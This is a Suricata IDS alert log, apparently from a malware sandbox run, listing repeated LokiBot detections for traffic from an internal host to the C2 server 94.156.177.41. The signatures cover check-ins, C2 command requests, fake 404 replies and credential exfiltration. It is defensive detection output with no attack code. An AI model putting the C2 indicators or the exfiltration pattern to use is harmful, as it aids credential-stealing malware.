Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49800 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49806 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49806 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49806 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49806 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49788 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49788 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49845 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49806
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49845
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49788 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49788 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49800 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49794
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49834
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49748 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49748
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49800 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49913 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49913 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49788
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49883 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49864
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49913 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49869
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49883 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49898 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49754
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49830 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49830 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49830 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49757
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49913 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49898
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49913 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49851 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49830 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49883 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49830 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49781 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49851 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49851 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49922
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49883 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49800
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49781
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49932 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49769
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49932 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49932 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49883 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49981 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49932 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49853 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49830
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49826 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49875 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49775 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49853 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49853 -> 94.156.177.41:80
